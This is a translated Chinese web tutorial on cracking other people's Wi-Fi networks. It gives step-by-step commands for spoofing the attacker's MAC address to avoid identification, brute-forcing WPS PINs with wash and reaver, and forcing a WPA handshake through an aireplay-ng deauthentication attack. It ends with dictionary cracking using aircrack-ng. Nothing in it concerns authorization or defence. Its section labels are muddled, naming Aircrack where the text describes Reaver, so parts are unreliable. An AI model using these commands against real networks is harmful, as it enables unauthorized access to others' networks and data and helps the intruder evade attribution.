设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 网络安全 > 无线网络 > 正文

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用)

时间:2016-11-25 14:15 来源:未知 作者:SecYe安全 阅读:

从国外网站翻译过来的,可能不甚准确.转载请注明出处.

这篇文章的重点是教我们如何破解不安全的wi-fi网络,我使用的是一款在黑阔间非常流行的外部wi-fi卡AWUSO36H 802.11 b/g 5db,它的市场价大概是20-35美元.这款wi-fi卡的优势在于其广泛的范围,使用者可以挑选所有附近的接入点。

有很多软件可以用来破解wi-fi网络,本文将介绍最常用的两款软件.

1.Reaver

2.Aircrack

操作系统:ubuntu 11.04

第1部分:安装

>> A.(安装的Aplha Wi-Fi卡的驱动程序)

>> B. (安装Macchanger工具)

>> C.(Reaver工具的安装)

>> D(Aircrack工具安装)

第2部分(展示Reaver工具)

>> A.(理论)

>> B.(演示)

第3部分(使用Aircrack工具)

>> A.(演示)

Part1:安装

A.安装的Aplha Wi-Fi卡的驱动程序

当我们将Aplha卡插入USB的时候,需要用我们的linux机器检测。下面介绍Alpha驱动程序的安装过程.将aplha的驱动光盘插入到光驱中,打开终端,进入光盘所在的目录.输入”su”和root账号的密码(请确保您的安装过程是在root权限下进行).然后键入下面命令来安装驱动程序.

#make

#make install

#reboot

重启之后在终端输入”iwconfig”,你会看到一个新的无线接口,有可能是wlan0或者wlan1等,这个接口是有可能改变的。

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第1张  | 阿德马Web安全

 

在上图中,wlan1是我的新接口.

B.安装macchanger工具

当黑客入侵到别人的无线网络的时候,最担心的是如何隐藏他的MAC地址和aplha卡的ID来隐藏自己的身份.你通过你的aplha卡可以看到mac地址(如:00:AC:CA:11:22:44),或者您可以打开终端输入”ifconfig”来检查HWaddr00 WLAN接口,寻找诸如HWaddr 00:11:22:XX:XX:XX.

我们需要在攻击之前改变我们的MAC地址,下面介绍MACchanger工具的安装。打开终端输入以下命令:

#apt-get install macchanger

注意:如果返回错误,在这里只需在终端输入“#apt-get update”,然后再次尝试上面的命令。一旦安装完成后,使用以下命令检查是否安装成功.

#macchanger –help

如果你看到下面的帮助文件,那么你已经成功安装了MACCHANGER工具。

Macchanger的相关参数

用法: macchanger [options] device

-h,           –help                       显示帮助信息

-v,           –version                 打印版本信息并退出

-s,            –show                      打印出mac的地址并退出

-e,            –ending                   不改变供应商的字节

-a,             –anothering          另一组随机同类厂商的MAC

-A,                                                 设置随机同类厂商的任何形式的MAC

-p,             –permanent           重置为原始的永久的MAC

– r,             –random                 设置完全随机的MAC

-l,              –list[=keyword]    显示知名厂商

-m,           –mac=XX:XX:XX:XX:XX:XX

-mac  XX:XX:XX:XX:XX:XX       设置Mac

 

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第2张  | 阿德马Web安全

 

下面继续进入下一部分的安装

C.安装Reaver工具

在google搜索reaver-1.2.tar.gz,下载保存在桌面,打开终端(root权限),进入到桌面的文件夹,

这样你就可以使用下面的命令提取tar文件:

#tar zxvf file_name

你会看到一个创建的文件夹,使用”cd file_name”从终端进入该文件夹,寻找具有”configure”文件

的文件夹,一旦你找到它,在中断键入一下命令(确保你是在配置文件相同的路径):

#./configure
#make
#make install
注意:如果遇到错误,可能需要安装一些相关的依赖组件,如下;
#apt-get install libpcap-dev
注意:它可能依赖于SQL-lite,因此输入以下命令
#apt-get install libsqlite3-dev

然后输入以下命令继续安装:

#./configure
#make
#make install

检查Reaver工具是否安装成功,输入以下命令:

#reaver

你将看到以下的相关信息

Reaver v1.4 WiFi Protected Setup Attacktool

Copyright (C) 2011,Tactical Network Solutions,Craig Heffner

<cheffner@tacnetsol.com>

相关参数(参数的相关说明未翻译,大家可以自行翻译):

-i, –interface=<wlan> Name of the monitor-mode interface to use

-b, –bssid=<mac> BSSID of the target AP

Optional Arguments:

-m, –mac=<mac> MAC of the host system

-e, –essid=<ssid> ESSID of the target AP

-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)

-o, –out-file=<file> Send output to a log file [stdout]

-s, –session=<file> Restore a previous session file

-C, –exec=<command> Execute the supplied command upon successful pin recovery

-D, –daemonize Daemonize reaver

-a, –auto Auto detect the best advanced options for the target AP

-f, –fixed Disable channel hopping

-5, –5ghz Use 5GHz 802.11 channels

-v, –verbose Display non-critical warnings (-vv for more)

-q, –quiet Only display critical messages

-h, –help Show help

Advanced Options:

-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin

-d, –delay=<seconds> Set the delay between pin attempts [1]

-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]

-g, –max-attempts=<num> Quit after num pin attempts

-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]

-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts

-t, –timeout=<seconds> Set the receive timeout period [5]

-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]

-A, –no-associate Do not associate with the AP (association must be done by another application)

-N, –no-nacks Do not send NACK messages when out of order packets are received

-S, –dh-small Use small DH keys to improve crack speed

-L, –ignore-locks Ignore locked state reported by the target AP

-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet

-n, –nack Target AP always sends a NACK [Auto]

-w, –win7 Mimic a Windows 7 registrar [False]

Example:

reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

D.安装aircrack工具

打开终端输入以下命令:

#apt-get install  aircrack-ng

安装完成输入”aircrack-ng”命令,你会在屏幕上看到以下信息

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第3张  | 阿德马Web安全

 

这里WLAN1是我的Wi-Fi卡接口。现在,我们已经完成我们的安装过程中,我们可以开始攻击的学习.

Part2:Aircrack工具的使用.

A.(理论)

在开始攻击之前,让我们看看是什么让aircrack工具在wi-fi攻击中如此强大.2007年wi-fi联盟推出了wi-fi的保护设置(WPS;最初的wi-fi简单配置)来协助家庭用户时谁知道会有小的无线安全和设置问题.基本上,它是用来保护家庭用户的网络,并添加新的无线设备。它具有如下所示的路由器上的按钮。

 

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第4张  | 阿德马Web安全

 

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第5张  | 阿德马Web安全

 

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第6张  | 阿德马Web安全

 

一旦你找到了网络,你需要输入能在路由上找到的PIN码(基本上是8位数).

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第7张  | 阿德马Web安全

WPS设置在暴力攻击面前是脆弱的,在个2011年12月发现的漏洞,让很多具有wps功能的路由器受到了影响.

最初,用户被要求禁用WPS按钮,但在某些路由器上没有办法禁用WPS,Aircrack实际上是暴力猜解工具。让我们来看看具体的攻击过程是如何实现的:

step1: 首先确定wifi网络中支持wps(Reaver中可以看到),然后打开终端输入以下命令(wash已经随Reaver安装)

#wash -i mon0

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第8张  | 阿德马Web安全

然后打开reaver tool输入

#reaver -i mon0 -b ENTER_BSSID_HERE -vv

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第9张  | 阿德马Web安全

整个破解时间(获取wps pin,wpa psk,and ap ssid)需要大约2-4小时

所以总结来说,使用reaver来hacking wifi网络步骤容易,但是相对来说比较耗时

PS:在更改MAC address时,如果报错说wlan1 is busy,尝试输入以下命令

#ifconfig wlan1 down

# macchanger -A wlan1

#ifconfig wlan1 up

Part3:使用Aircrack hacking

step1:

#airmon-ng start wlan1 (puts card in monitoring mode)

step2:现在我们抓取几个wif网络

#airodump-ng mon0

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第10张  | 阿德马Web安全

你可以看到BSSID,ESSID and channel以及加密方式

step3:输入以下命令

#airodump-ng -c 1 -w (filename) -bssid (bssid) mon0

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第11张  | 阿德马Web安全

如上图 我们已经连接成功

step4:

为了hack 这里的wpa/wpa2/wep,我们需要建立握手.为了形成握手,我们需要从第三方网络外面接入

#aireplay-ng -0 5 -a (bssid) mon0

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第12张  | 阿德马Web安全

step5:

现在一个握手包文件包文件已经被创建,我们可以去看抓包的结果。ctrl+c停止step3中的进程,然后在终端输入:

aircrack-ng drag_file_into_terminal

Wi-Fi Hacking(无线黑阔工具Reaver和Aircrack的安装使用) - 第13张  | 阿德马Web安全

step6:最后输入以下命令进行破解

#aircrack-ng -w dirctionary_directory handshake_file

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%